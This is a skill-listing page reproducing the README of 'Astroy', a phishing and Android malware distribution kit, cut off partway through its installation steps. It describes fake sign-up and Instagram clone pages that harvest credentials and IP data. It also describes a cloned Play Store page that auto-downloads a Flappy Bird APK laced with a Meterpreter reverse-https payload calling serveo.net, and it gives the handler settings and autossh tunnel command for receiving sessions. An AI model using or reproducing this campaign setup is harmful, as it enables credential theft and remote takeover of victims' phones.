SkillAgentSearch skills...

Astroy

A bunch of PHP templates and Python scripts made to demonstrate how easy it is to pull off social engineering and phishing to successfully distribute Android malware

Install / Use

/learn @liltrendi/Astroy
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Astroy <img src="resources/robot.svg" width="22px" height="22px">

<img src="https://img.shields.io/badge/Python-3.5%20%7C%203.6%20%7C%203.7-red.svg"> <img src="https://img.shields.io/badge/Requirements-Up%20To%20Date-green.svg"> <img src="https://img.shields.io/badge/Apache-v2.4.38-lightgrey.svg"> Build Status <img src="https://img.shields.io/badge/PHP-v7.3.2-orange.svg"> <img src="https://img.shields.io/badge/License-MIT-blue.svg"> <img src="https://img.shields.io/badge/OS-Linux-brightgreen.svg"> <img src="https://img.shields.io/badge/OpenSSH-v7.9-red.svg">

Astroy is a collection of templates outsourced from different projects, combined to launch a powerful, attractive and easy to pull off a two-in-one phishing and Android malware distribution campaign.

I made this as a tool without distribution in mind, and did not think I would come to open-source it. As a result, a LOT of assumptions have been made when coding this, and it's gonna take you a bit of tweaking if the OS you're running isn't configured how the tool needs it to be.

<!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE-->

Table of Contents

<!-- END doctoc generated TOC please keep comment here to allow auto update -->

Why Astroy?

<img src="resources/flappy.jpg" width="100%" height="300px">

We live in a generation where, although scores of people would fall for most get-rich-quick scams, the effort required to social engineer them into actually compromising themselves is tremendous. Astroy sells itself as an ordinary website that pays users to install and use its Android app - an obviously untrue claim. It instead gathers the credentials of anyone who signs up for it, and provides a malicious APK file (a Flappy Bird game laced with a reverse-https payload) for the unsuspecting user to download. If the user runs the malicious game, the attacker will gain a Meterpreter session, effectively pulling off a successful double penetration (no pun intended). The template below, an identical clone of the Google Play Store, is the last page that the user is presented with, where the malicious APK file automatically downloads itself then quickly redirects to the official Play Store site, making the user actually believe the genuinity of the app he is about to install:

The phishing templates comprise a normal sign up page, and an Instagram clone. The reason I did not add more popular templates like Facebook and Google is because their designs weren't as appealing as Instagram's. Special shout out to thelinuxchoice for the Instagram phishing template - I modified their version by removing their backend and adding mine.

The Flappy Bird game is hardcoded with the LHOST serveo.net and LPORT 2345, therefore, anyone can use it with these values. On Metasploit, run set lhost localhost and set lport 2345 and set payload android/meterpreter/reverse_https to configure the multi handler. Just make sure you run autossh -tt -M 0 -o 'ServerAliveInterval 30' -o 'ServerAliveCountMax 3' -R 2345:localhost:2345 serveo.net beforehand to forward TCP connections to your machine, and your payload will connect over WAN, only ever disconnecting if you terminate it.

This tool is capable of collecting emails, full names and passwords, alongside Instagram username and password combos. It also collects the user's IP address, user agents, type of device and logs the time when the user tried to access the pages.

Astroy only serves as a proof of concept on what black hat hackers can achieve if they get creative. I take no responsibility whatsoever for any usage of the tool for any illegal activities by anyone else.

Assumptions

Because I initially coded this without distribution in mind, it was made without consideration for other Linux OS's. As such, this tool is made with the assumption that:

  1. You're system has Python 3. To set up most of the things that the tool needs, you'll need to run the main python file (setup.py) with Python 3. Also, the index.php files in the directories download and account/instagram make calls to Python 3 to run retrieve.py and del.py respectively. Depending on how you invoke your Python 3 (for example, I run files like this - python3 example.py - because my system has two Python versions installed), you might need to alter the default invocation in the index.php files specified above. Lastly, every Python file in Astroy has a shebang that invokes the Python 3 version installed on my system - this assumes that your Python 3 is located at /usr/bin/python3. Change this line as necessary.

  2. Your system has Apache2 and that the default directory for serving web pages is /var/www/html. It also assumes that you have correctly set up PHP with Apache so that any PHP files are correctly rendered by Apache when its webserver is started. The default Apache webserver listens on port 80, and this tool abides by that.

  3. Your system has PHP. I recommend version 7, because I haven't tested this tool with other versions of PHP.

  4. Your system has OpenSSH and AutoSSH. These are used to establish connections to Serveo, which forwards ports and allows your locally served web pages to be available publicly.

  5. You will clone all the main files to /var/www/html, or copy them to that directory. This means that the directories account, download and img, plus the files index.php, requirements.txt and setup.py will all be inside the directory /var/www/html. This is the base directory, where Apache will serve index.php as the landing page, under the default url https://astroy.serveo.net. The directories account, account/instagram and download will all serve their files through PHP servers (either on custom ports or the default ones if none are provided as arguments), and will have the urls https://account.serveo.net, https://app.serveo.net and https://download.serveo.net respectively. For the sake of avoiding conflict, be sure there are no existing files in /var/www/html before you copy or download Astroy's files to this directory.

  6. You are running Linux, as root. I coded this for Kali, but with the right tweaking, it will run on any Linux OS smoothly.

  7. It will be totally misused. With the rise of noob hackers and experienced black hats looking for easy scripts for use in their nefarious activities, this tool is bound to act as an asset for breaking the law. Since Serveo blocks phishing subdomains as soon as the subdomain is reported, the urls mentioned in Assumption 5 will most likely be blocked after a while, or flagged as malicious - yet they are hardcoded in the PHP files, without any provided means to change them via the command line. The assumption this tool makes is that you'll have to edit each PHP file individually, find any anchor links pointing to the default subdomains and manually change them to the desired subdomains.

Pre-requisites

You basically need Apache2, OpenSSH, PHP and AutoSSH.

Tap each package to get an idea of how the installation and configuration procedures are like (I recommend consulting your package managers). For Kali Linux users (and Ubuntu) you can get the packages installed using this one-liner:

apt-get install ssh autossh php apache2

Then, you need to make an initial connection to serveo so that it is added permanently to the list of known hosts. You can do that by running:

ssh serveo.net

It should then ask you ask whether you're sure about connecting to serveo. Hit Enter or type yes then wait a second or two, and it should say something like:

The authenticity of host 'serveo.net (159.89.214.31)' can't be established.
RSA key fingerprint is SHA256:07jcXlJ4SkBnyTmaVnmTpXuBiRx2+Q2adxbttO9gt0M.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'serveo.net,159.89.214.31' (RSA) to the list of known hosts.
Press g to start a GUI session and ctrl-c to quit.

Press Ctrl-c and that'll be it.

Only after you are sure you've got things set up and working correctly should you proceed with the next step.

Installation

Clone the repository:

git clone https://github.com/briancanspit/Astroy.git

Get into the cloned directory and list its files:

cd Astroy && ls -l

Copy all the files in the directory to Apache's base directory (if the

View on GitHub
GitHub Stars6
CategoryDevelopment
Updated2mo ago
Forks1

Languages

PHP

Security Score

90/100

Audited on Jan 10, 2026

No findings